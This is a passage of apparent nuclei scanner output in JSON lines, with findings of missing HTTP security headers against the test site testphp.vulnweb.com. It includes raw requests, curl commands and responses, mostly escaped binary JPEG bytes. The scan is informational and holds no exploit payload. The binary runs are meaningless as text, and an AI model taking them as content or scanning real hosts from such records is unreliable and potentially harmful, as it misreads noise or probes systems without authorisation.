0006\\ufffd;\\ufffd\\ufffd4X\\ufffd\\u000b~M\\u0002k\\ufffd\\u000e\\ufffd?O\\ufffd\\ufffd\\ufffd6@BѻF\\ufffd\\u001c:\\ufffd5`\\ufffdD\\u001a\\ufffd\\ufffd\\ufffd\\u0000m\\u0005\\ufffd\\n\\ufffdH\\ufffd\\ufffd\\u0003w\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdbj\\\\\\ufffd\\u0007\\ufffd\\ufffdt\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdx\\ufffdZ3HСD%\\ufffd\\ufffd\\ufffd\\ufffdT\\ufffd\\u0017B\\ufffd\\u001e\\ufffd\\ufffdv\\ufffd\\ufffd\\u0002\\ufffd\\ufffd[\\ufffdB\\u003ecc\\ufffdu\\ufffdP\\ufffd|\\ufffd\\ufffd\\ufffd˃d\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0016@;\\u001et\\ufffd\\ufffd\\ufffdI q\\ufffd\\ufffd\\ufffd\\u001c|\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdCL\\ufffd\\ufffd1\\ufffd%@\\ufffdB\\ufffd\\ufffd\\u0008\\u0004\\ufffd5\\ufffd\\u001b\\u0017V\\u003c\\ufffd8\\ufffd\\ufffd#\\ufffdQ\\u001364\\ufffdE#Fɹ\\u0018\\ufffd\\ufffd\\ufffdk\\u000e\\u003c\\u0010H#\\ufffd$jΒޤ~\\ufffd\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdZ\\ufffd:\\u000f\\u001d'5\\ufffd\\ufffd\\ufffd\\ufffdzs;\\ufffdӤ\\ufffd\\ufffd6\\ufffd\\r\\u0015$i\\ufffd⤠nE?q\\ufffd\\ufffd\\ufffdsK\\u0019h\\u0018\\ufffd( \\ufffd5d]_﫺fw\\ufffdL\\u0019\\u0000$\\ufffdk\\ufffd\\u0000G\\ufffd\\\\\\ufffd\\ufffdЧO\\ufffd\\ufffdm\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffdx\\u0004]\\ufffd}\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffd$0ώ\\ufffd\\ufffd\\u0010\\ufffdB7314\\u0015Tr\\ufffd\\ufffd\\u0000\\ufffd\\ufffdc\\ufffdj\\ufffd\\ufffd\\ufffd\\u001aJ\\ufffd]A\\u0017tG\\ufffd\\u0007L\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd嶰g\\ufffd8\\ufffd\\ufffdW\\u001f\\\"F\\ufffd\\\\\\t\\u0013\\ufffdS\\ufffd\\ufffd_c\\ufffd:\\ufffd\\ufffd\\ufffdGYy\\ufffd\\u0002z\\ufffd\\ufffd\\u0011;U\\ufffd\\ufffd\\ufffd\\u0001I\\ufffd\\ufffd]\\ufffdw\\ufffdگ\\ufffdd\\ufffdt\\ufffd\\ufffdXs\\u001d\\ufffdfW\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffdx\\u0004X\\ufffd/\\ufffdW\\ufffd\\ufffd\\ufffd\\ufffdD\\u0005\\u0015\\ufffdC7\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffdp+β]\\u001b\\ufffd\\u003cl\\ufffd}Rޒ\\u000b\\ufffdC]\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:12.787583093Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:12.787669323Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufff